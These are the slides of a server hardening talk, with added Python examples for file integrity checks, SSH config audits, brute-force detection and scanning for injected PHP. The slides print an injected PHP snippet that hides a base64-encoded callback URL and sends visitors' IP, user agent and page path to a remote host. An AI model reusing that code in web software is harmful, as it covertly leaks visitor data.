
Security tips and tricks, part 001

Tonimir Kišasondi, mag.inf., EUCIP, Laboratory for Open Systems and Security, Faculty of Organization and Informatics, Varaždin

#nmap -A tkisason.foi.hr
Nmap scan report for tkisason.foi.hr
Host is up (0.00033s latency).
Not shown: 970 closed ports, 27 filtered ports
PORT STATE SERVICE VERSION
Security, Crypto, Open Systems
kisasondi@gmail.com
twitter: @kisasondi
Skype: tkisason
Open Systems and Security Lab, Faculty of Organization and Informatics, Varaždin

$ ls ~/talks/dorscluc2013
Don't talk about security, make a data science talk
Crypto!
HC security topic
Let me just show some tips and tricks everyone should and can do

Security is associated with failure

We are definitely not winning
Governments are trying to regulate with various laws, but they are not succeeding
Groups that hack stuff for lulz are not helping

APT and other buzzwords


You work 8, 10, 12 hours a day
Your attackers work 24/7
Half-life research - TTP (time-to-patch):
48 days to patch internal servers
19 days to patch external ones

Exposure
You need to plug every hole in your system
Your attackers only need to find one hole

Attack surface & loot


If you think you are not interesting for hackers, think again.
Your host can be used for:
Launching DDoS
Scanning / exploit / crimekit distribution
Dump site / phish site
Spamming
Bitcoin mining
...

Attack surface & loot


Tighten up your attack surface!
Do you really need that port/service/webapp in the open?
Do I need that feature?
Keep track of all your services/hosts/VMs/apps
Review, check and don't trust

Trends:
Automated scanners / script kiddie hack tools keep getting better and more effective
Remember there is a black market for that stuff
Script kiddies are actually trying to learn something
Watering hole exploits / client-side exploits
Please, kill Java

Custom, targeted attacks

Contamination:
You spread your fail to other hosts. What happens when you are a little web dev company and you have 94 vhosts on a single machine?
Most are WordPress
Most have misc (read: outdated) plugins
A lot of custom PHP code (OWASP? What's that?)
System isn't managed
No security review/practice/vuln tracking
No jailing / compartmentalization

Tip #1
Don't wait for a compromise to happen
Set up your infrastructure early
Prepare your system for the worst
Hardening / security services
Logging / log mirroring
Backups
Be proactive (WAF, IDS, IPS, SIEM)
Off-site or offline config/source backups from a trusted source?

Example: Linux/Cdorked.A
Patched Apache, nginx, lighttpd binary
They also set the binary to be immutable. Thanks!
No other "weird" files on disk
Evil Apache loads some injections into requested pages:
http://894651446c103f0e.after1201.com

Targeting only vulnerable clients

Injection of custom code into your scripts
Effectiveness raised, because only vulnerable clients get nabbed
Smart enough to evade site crawlers / search engine bots

Tip #2
If you don't use rkhunter and chkrootkit... start using a HIDS. I like OSSEC:
File integrity checking (AIDE; debsums; rpm --verify)
Log monitoring (petit / splunk / logstash)
Rootkit detection (rkhunter / chkrootkit)
Active response (fail2ban)
No packaging :/

Useless if you don't monitor its logs; use AnaLogi, use ANY log monitoring tool!
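The file integrity checking the slide lists (AIDE, debsums, rpm --verify) boils down to one idea: record a trusted baseline of hashes and metadata, then compare the live filesystem against it. The Python below is an added example written for this page, not OSSEC's, AIDE's or the talk author's code; the directory it baselines, the "binaries" in it and the tampering it simulates (a replaced web server binary, as in the Cdorked case above, plus an unexpected new file) are all constructed in a temporary directory.

```python
import hashlib
import json
import os
import shutil
import tempfile


def hash_file(path, chunk=65536):
    """SHA-256 of a file, read in chunks so large binaries are not loaded into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_baseline(root):
    """Walk `root` and record hash, size and permission bits for every regular file.

    Symlinks are skipped; only what is actually on disk is recorded.
    """
    baseline = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            st = os.stat(full)
            rel = os.path.relpath(full, root)
            baseline[rel] = {
                "sha256": hash_file(full),
                "size": st.st_size,
                "mode": st.st_mode & 0o7777,
            }
    return baseline


def compare(baseline, current):
    """Return added, removed and changed relative paths (sorted, so output is stable)."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    return {"added": added, "removed": removed, "changed": changed}


def demo():
    """Constructed scenario: baseline a fake sbin/ directory, then tamper with it."""
    root = tempfile.mkdtemp()
    try:
        sbin = os.path.join(root, "sbin")
        os.makedirs(sbin)
        with open(os.path.join(sbin, "httpd"), "wb") as f:
            f.write(b"original apache binary")          # placeholder content, not a real binary
        with open(os.path.join(sbin, "nginx"), "wb") as f:
            f.write(b"original nginx binary")
        baseline = build_baseline(root)

        # Simulated compromise: the web server binary is replaced and an odd file appears.
        with open(os.path.join(sbin, "httpd"), "wb") as f:
            f.write(b"patched apache binary")
        with open(os.path.join(sbin, ".odd"), "wb") as f:
            f.write(b"x")
        return compare(baseline, build_baseline(root))
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Two practical points the code does not show: the baseline is only as trustworthy as where it is kept, so store it off the host (the "off-site config backups from a trusted source" of Tip #1), and a hash comparison will not tell you that a binary was made immutable; for that you still need to look at extended attributes (lsattr) as part of the same review.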

Failed password for root from 209.92.176.41 port 46864 ssh2
Failed password for root from 209.92.176.41 port 49866 ssh2
Failed password for root from 209.92.176.41 port 53300 ssh2
Failed password for root from 209.92.176.41 port 55774 ssh2
Failed password for root from 209.92.176.41 port 59157 ssh2
Failed password for root from 209.92.176.41 port 33723 ssh2

Tip #3
I don't even want to talk about password security.
Use SSH keys for remote login, disable password-based auth and remote root logins in sshd_config, use sudo for local root access.
If you have a multi-user system, avoid contamination.
A root password of 123456 doesn't help!
Watch out for file permissions!
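A quick way to check whether a host actually follows this tip is to audit its sshd_config rather than trust that someone edited it. The script below is an added example written for this page, not part of the talk or of OpenSSH; the policy table (which directives must be set and to what) is this example's assumption, while the directive names are real sshd_config keywords. It respects two sshd parsing rules that often bite: sshd uses the first occurrence of a directive, and anything after a Match line is conditional, so the audit stops there. Both the weak and the hardened configs are constructed samples.

```python
import re

# Hardening policy assumed by this example: each directive must be set explicitly to this value.
POLICY = {
    "PasswordAuthentication": "no",
    "PermitRootLogin": "no",
    "PubkeyAuthentication": "yes",
}


def parse_sshd_config(text):
    """Return {directive: value} for the global section of an sshd_config.

    Directive names are case-insensitive and may be written 'Key value' or 'Key=value'.
    Only the first occurrence of a directive counts, and parsing stops at the first
    'Match' block, mirroring how sshd itself reads the file.
    """
    canonical = {k.lower(): k for k in POLICY}
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip().lower()
        if key == "match":
            break
        if key in canonical and canonical[key] not in settings:
            settings[canonical[key]] = value
    return settings


def audit(text):
    """List findings: directives that are missing (so the sshd default applies) or set to a weak value."""
    settings = parse_sshd_config(text)
    findings = []
    for directive, wanted in POLICY.items():
        got = settings.get(directive)
        if got is None:
            findings.append(f"{directive} not set explicitly (sshd default applies); want {wanted}")
        elif got != wanted:
            findings.append(f"{directive} is {got}; want {wanted}")
    return findings


# Constructed sample: still allows passwords and remote root login.
WEAK_CONFIG = """
Port 22
PermitRootLogin yes
PasswordAuthentication yes
PasswordAuthentication no   # added later, but ignored: sshd keeps the first value
Match User backup
    PasswordAuthentication no
"""

# Constructed sample: the hardened version the slide describes.
HARDENED_CONFIG = """
Port 22
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit(cfg) or ["ok"])
```

Running it against /etc/ssh/sshd_config on a fleet is a cheap check to add to the "review, check and don't trust" routine from the attack surface slide; the same parser can be pointed at a Match block if a per-user exception needs its own policy.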

Failed password for invalid user 2012eduworld2 from 83.212.118.74 port 58186 ssh2
Failed password for invalid user perfectpond.org from 83.212.118.74 port 59810 ssh2
Failed password for invalid user dna1admin from 83.212.118.74 port 51229 ssh2
Failed password for invalid user langliguo from 83.212.118.74 port 53687 ssh2
Failed password for invalid user bkalle from 83.212.118.74 port 58501 ssh2

Tip #4 - fail2ban / sshguard

Simple app
On install protects OpenSSH from online password cracking
Your auth logs become readable!
It can be extended to cover any log file
fail2ban + mod_security
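To make concrete what fail2ban does with the auth log lines shown under Tip #2 and Tip #3, here is the core of its logic in Python: parse "Failed password" lines, keep a sliding window per source address, and flag the address once it produces maxretry failures within findtime seconds. This is an added example written for this page, not fail2ban's or sshguard's code; the log lines are constructed (syslog prefixes added to the addresses and usernames from the slides), and the year is assumed because syslog lines carry none. It also shows the edge case a fixed window misses: the second address fails only every 30 minutes and stays under the default window.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Matches both "Failed password for root from ..." and "Failed password for invalid user X from ..."
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$"
)
ASSUMED_YEAR = "2013"   # syslog timestamps have no year; constructed sample is from 2013


def parse_line(line):
    """Return (timestamp, ip, user) for a failed-password line, or None for anything else."""
    m = FAILED_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{ASSUMED_YEAR} {m.group('ts')}", "%Y %b %d %H:%M:%S")
    return ts, m.group("ip"), m.group("user")


def find_offenders(lines, maxretry=5, findtime=600):
    """fail2ban-style detection: ban an IP at the first moment it has `maxretry`
    failures inside a `findtime`-second window. Returns {ip: time of ban}."""
    window = defaultdict(deque)
    banned = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, ip, _user = parsed
        if ip in banned:
            continue
        q = window[ip]
        q.append(ts)
        while q and (ts - q[0]).total_seconds() > findtime:
            q.popleft()                     # forget failures older than the window
        if len(q) >= maxretry:
            banned[ip] = ts
    return banned


# Constructed sample log: a fast root brute force, one successful key login, and a slow
# invalid-user spray that stays below the default window.
SAMPLE_LOG = """\
May 12 10:00:01 www sshd[2231]: Failed password for root from 209.92.176.41 port 46864 ssh2
May 12 10:00:03 www sshd[2233]: Failed password for root from 209.92.176.41 port 49866 ssh2
May 12 10:00:05 www sshd[2235]: Failed password for root from 209.92.176.41 port 53300 ssh2
May 12 10:00:07 www sshd[2237]: Accepted publickey for deploy from 10.0.0.5 port 40112 ssh2
May 12 10:00:08 www sshd[2239]: Failed password for root from 209.92.176.41 port 55774 ssh2
May 12 10:00:10 www sshd[2241]: Failed password for root from 209.92.176.41 port 59157 ssh2
May 12 10:00:12 www sshd[2243]: Failed password for root from 209.92.176.41 port 33723 ssh2
May 12 10:05:00 www sshd[2300]: Failed password for invalid user 2012eduworld2 from 83.212.118.74 port 58186 ssh2
May 12 10:35:00 www sshd[2301]: Failed password for invalid user perfectpond.org from 83.212.118.74 port 59810 ssh2
May 12 11:05:00 www sshd[2302]: Failed password for invalid user dna1admin from 83.212.118.74 port 51229 ssh2
May 12 11:35:00 www sshd[2303]: Failed password for invalid user langliguo from 83.212.118.74 port 53687 ssh2
May 12 12:05:00 www sshd[2304]: Failed password for invalid user bkalle from 83.212.118.74 port 58501 ssh2
"""

if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print("default window:", find_offenders(lines))
    print("2h window:     ", find_offenders(lines, findtime=7200))
```

The slow spray is why the slide pairs fail2ban with Tip #3: a ban list buys readable logs and cuts the noise, but only key-based authentication makes the remaining guesses irrelevant. Widening findtime catches the slow case at the cost of more false positives, which is the usual tuning trade-off.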

$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
// Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if ((strstr($sUserAgent, 'google') == false) AND (strstr($sUserAgent, 'yahoo') == false)
    AND (strstr($sUserAgent, 'baidu') == false) AND (strstr($sUserAgent, 'msn') == false)
    AND (strstr($sUserAgent, 'opera') == false) AND (strstr($sUserAgent, 'chrome') == false)
    AND (strstr($sUserAgent, 'bing') == false) AND (strstr($sUserAgent, 'safari') == false)
    AND (strstr($sUserAgent, 'bot') == false)) // Bot comes
{
    if(isset($_SERVER['REMOTE_ADDR']) == true AND isset($_SERVER['HTTP_HOST']) == true) {
        // Create bot analitics
        $stCurlLink = base64_decode('aHR0cDovL2dsb2JhbGJyb3dzZXJzdGF0aXN0aWMuY29tL3N0YXRGL3N0YXQucGhw')
            .'?ip='.urlencode($_SERVER['REMOTE_ADDR'])
            .'&useragent='.urlencode($sUserAgent)
            .'&domainname='.urlencode($_SERVER['HTTP_HOST'])
            .'&fullpath='.urlencode($_SERVER['REQUEST_URI'])
            .'&check='.isset($_GET['look']);
        $stCurlHandle = curl_init( $stCurlLink );
    }
}
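The injected PHP above has a recognisable shape: it cloaks on the user agent (skipping search engines and bots, which is why crawlers never see it), hides its callback URL in a base64 literal, and leaks the visitor's address, host and path to a remote script. A defender can scan a web root for that combination instead of waiting to notice the traffic. The scanner below is an added example written for this page, not a tool from the talk; its indicator list and weights are this example's assumption, and both the injected and the benign PHP samples are constructed (the encoded URL is a placeholder, not the address from the original snippet).

```python
import base64
import re

# Indicators modelled on the injected snippet; the weights are an assumption of this example.
INDICATORS = {
    "ua_cloaking": (re.compile(r"HTTP_USER_AGENT", re.I), 1),
    "bot_list": (re.compile(r"strstr\s*\(\s*\$\w+\s*,\s*'(?:google|yahoo|baidu|msn|bing|bot)'", re.I), 2),
    "b64_literal": (re.compile(r"base64_decode\s*\(\s*['\"][A-Za-z0-9+/=\s]{16,}['\"]", re.I), 3),
    "remote_call": (re.compile(r"\b(?:curl_init|file_get_contents|fsockopen)\s*\(", re.I), 1),
    "leak_request": (re.compile(
        r"urlencode\s*\(\s*\$_SERVER\s*\[\s*['\"](?:REMOTE_ADDR|HTTP_HOST|REQUEST_URI)", re.I), 2),
}


def decode_b64_literals(src):
    """Decode base64 literals passed to base64_decode so the reviewer sees the hidden URL."""
    out = []
    for m in re.finditer(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]", src):
        raw = re.sub(r"\s+", "", m.group(1))    # strip line-wrapping whitespace
        try:
            out.append(base64.b64decode(raw, validate=True).decode("utf-8", "replace"))
        except ValueError:
            continue                              # not valid base64; skip it
    return out


def scan_php(src, threshold=5):
    """Score one PHP source string; 'suspicious' when the weighted indicator sum reaches threshold."""
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(src)]
    score = sum(INDICATORS[name][1] for name in hits)
    return {
        "score": score,
        "suspicious": score >= threshold,
        "hits": hits,
        "decoded": decode_b64_literals(src),
    }


# Constructed sample shaped like the injected snippet above; the URL is a placeholder.
PLACEHOLDER_URL = b"http://stats.example.invalid/stat.php"
INJECTED = """<?php
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
if ((strstr($sUserAgent, 'google') == false) AND (strstr($sUserAgent, 'bot') == false)) {
    $stCurlLink = base64_decode('__B64__') . '?ip=' . urlencode($_SERVER['REMOTE_ADDR'])
        . '&domainname=' . urlencode($_SERVER['HTTP_HOST']);
    $stCurlHandle = curl_init($stCurlLink);
}
""".replace("__B64__", base64.b64encode(PLACEHOLDER_URL).decode())

# Constructed benign sample: a theme that only logs the user agent.
BENIGN = """<?php
$ua = $_SERVER['HTTP_USER_AGENT'];
error_log("visitor: " . $ua);
"""

if __name__ == "__main__":
    for name, src in (("injected", INJECTED), ("benign", BENIGN)):
        print(name, scan_php(src))
```

Run over every .php file under the vhosts (the 94-vhost box from the contamination slide is exactly where this pays off) and review anything that scores; a file integrity baseline catches the same injection earlier, but a content scan also finds code that was planted before the baseline was taken.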

Targeting
Attacks are getting more and more targeted
Password reuse is the norm
Attackers don't want to seed their exploit to a host that's not vulnerable
Better evasion options
Do you have HIDS / NIDS / SIEM?
Train your people!

Good baselines:
NSA-IA Mitigation guidance:
http://www.nsa.gov/ia/mitigation_guidance/index.shtml

OWASP:
www.owasp.org

CIS Security benchmarks:
https://benchmarks.cisecurity.org

www.google.com

webservers
Disable all HTTP methods you don't use (TRACE, OPTIONS, HEAD...?)
Watch out!

Use mod_security
LXC is easy, try to separate your services as much as possible
It does have some problems (iptables conntrack)
They can be fixed easily

end rant
I hope this talk will be useful to you. Educate yourself and your users, at least that isn't difficult. Prepare your systems, harden them while you still can.

Questions?
twitter: @kisasondi

Thank you
twitter: @kisasondi
